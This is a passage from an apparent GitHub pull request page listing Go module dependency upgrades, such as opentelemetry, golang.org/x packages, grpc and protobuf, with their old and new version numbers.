github.com/ulikunitz/xz v0.5.11 -> v0.5.12
github.com/vbauerster/mpb/v8 v8.7.2 -> v8.7.5
go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.45.0 -> v0.49.0
go.opentelemetry.io/otel v1.19.0 -> v1.24.0
go.opentelemetry.io/otel/metric v1.19.0 -> v1.24.0
go.opentelemetry.io/otel/trace v1.19.0 -> v1.24.0
golang.org/x/crypto v0.21.0 -> v0.26.0
golang.org/x/exp v0.0.0-20240222234643-814bf88cf225 -> v0.0.0-20240719175910-8a7402abbf56
golang.org/x/mod v0.15.0 -> v0.20.0
golang.org/x/net v0.22.0 -> v0.28.0
golang.org/x/sync v0.6.0 -> v0.8.0
golang.org/x/sys v0.18.0 -> v0.24.0
golang.org/x/term v0.18.0 -> v0.23.0
golang.org/x/tools v0.18.0 -> v0.24.0
google.golang.org/genproto/googleapis/rpc v0.0.0-20231002182017-d307bd883b97 -> v0.0.0-20240318140521-94a12d6c2237
google.golang.org/grpc v1.59.0 -> v1.64.1
google.golang.org/protobuf v1.33.0 -> v1.34.2
tags.cncf.io/container-device-interface v0.6.2 -> v0.8.0

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

0 participants